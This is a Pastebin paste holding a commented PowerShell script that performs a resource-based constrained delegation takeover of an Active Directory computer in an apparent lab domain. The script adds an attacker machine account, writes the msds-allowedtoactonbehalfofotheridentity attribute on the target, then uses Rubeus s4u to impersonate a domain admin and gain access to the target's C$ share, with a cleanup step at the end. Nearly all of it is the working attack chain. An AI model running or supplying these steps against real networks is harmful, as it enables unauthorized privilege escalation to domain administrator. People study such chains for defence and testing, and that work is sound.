API tools faq
paste
Guest User

Untitled

a guest
Mar 4th, 2019
50
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.37 KB | None | 0 0
raw download clone embed print report
  1. # import the necessary toolsets
  2. Import-Module .\powermad.ps1
  3. Import-Module .\powerview.ps1
  4.  
  5. # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
  6. whoami
  7.  
  8. # the target computer object we're taking over
  9. $TargetComputer = "primary.testlab.local"
  10.  
  11. $AttackerSID = Get-DomainUser attacker -Properties objectsid | Select -Expand objectsid
  12.  
  13. # verify the GenericWrite permissions on $TargetComputer
  14. $ACE = Get-DomainObjectACL $TargetComputer | ?{$_.SecurityIdentifier -match $AttackerSID}
  15. $ACE
  16.  
  17. ConvertFrom-SID $ACE.SecurityIdentifier
  18.  
  19. # add a new machine account that we control
  20. New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
  21.  
  22. # get the SID of the new computer we've added
  23. $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
  24.  
  25. # build the new raw security descriptor with this computer account as the principal
  26. $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
  27.  
  28. # get the binary bytes for the SDDL
  29. $SDBytes = New-Object byte[] ($SD.BinaryLength)
  30. $SD.GetBinaryForm($SDBytes, 0)
  31.  
  32. # set new security descriptor for 'msds-allowedtoactonbehalfofotheridentity'
  33. Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
  34.  
  35. # confirming the security descriptor add
  36. $RawBytes = Get-DomainComputer $TargetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
  37. $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
  38. $Descriptor.DiscretionaryAcl
  39.  
  40. # currently don't have access to primary\C$
  41. dir \\primary.testlab.local\C$
  42.  
  43. # get the hashed forms of the plaintext
  44. .\Rubeus.exe hash /password:Summer2018! /user:attackersystem /domain:testlab.local
  45.  
  46. # execute Rubeus' s4u process against $TargetComputer
  47. # EF266C6B963C0BB683941032008AD47F == 'Summer2018!'
  48. # impersonating "harmj0y" (a DA) to the cifs sname for the target computer (primary)
  49. .\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:harmj0y /msdsspn:cifs/primary.testlab.local /ptt
  50.  
  51.  
  52. # cleanup - clear msds-allowedtoactonbehalfofotheridentity
  53. Get-DomainComputer $TargetComputer | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!